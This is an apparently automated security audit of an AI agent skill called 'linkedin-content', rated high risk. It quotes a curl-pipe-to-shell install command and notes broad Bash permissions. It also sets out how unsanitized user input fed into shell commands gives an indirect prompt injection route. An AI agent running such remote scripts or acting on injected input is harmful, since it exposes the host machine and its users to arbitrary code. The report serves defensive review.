linkedin-content
Fail
Audited by Gen Agent Trust Hub on Mar 13, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONEXTERNAL_DOWNLOADSCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION]: The skill explicitly instructs the agent to execute a shell script from a remote URL via
curl -fsSL https://cli.inference.sh | sh. This pattern is highly dangerous as it allows for arbitrary code execution from an unverified external source directly on the host machine. - [EXTERNAL_DOWNLOADS]: The skill uses
npx skills addto fetch and install external skill modules (inferencesh/skills@...). It also relies on theinfshCLI to download and run various remote applications liketavily/search-assistantandfalai/flux-dev-lora, creating a dependency on unverified third-party code. - [COMMAND_EXECUTION]: The skill's metadata grants it broad permission to execute the
Bashtool with any arguments for theinfshcommand. This level of access allows the skill to perform network requests and other sensitive operations through the CLI. - [PROMPT_INJECTION]: The skill exhibits surface area for indirect prompt injection attacks where malicious data could influence agent actions.
- Ingestion points: Untrusted user input is interpolated into the
--inputparameters ofinfsh app runcommands throughoutSKILL.md. - Boundary markers: No boundary markers, such as XML tags or explicit instruction delimiters, are used to prevent the agent from misinterpreting user-provided content as commands.
- Capability inventory: The skill possesses the capability to execute shell commands (
Bash) and access external AI services based on its instructions inSKILL.md. - Sanitization: There is no evidence of input validation, sanitization, or escaping of user data before it is passed to the shell and external tools.
Recommendations
- HIGH: Downloads and executes remote code from: https://cli.inference.sh - DO NOT USE without thorough review
- AI detected serious security threats
Audit Metadata